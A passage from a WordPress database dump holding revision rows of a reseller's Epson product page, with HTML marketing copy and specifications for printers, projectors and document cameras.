lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:27:11','2019-09-25 09:27:11','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3470,1,'2019-09-25 17:27:42','2019-09-25 09:27:42','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson WorkForce AL-M8100DNÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></h4><p><br /><br />Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 17:27:42','2019-09-25 09:27:42','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3471,1,'2019-09-25 17:28:27','2019-09-25 09:28:27','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 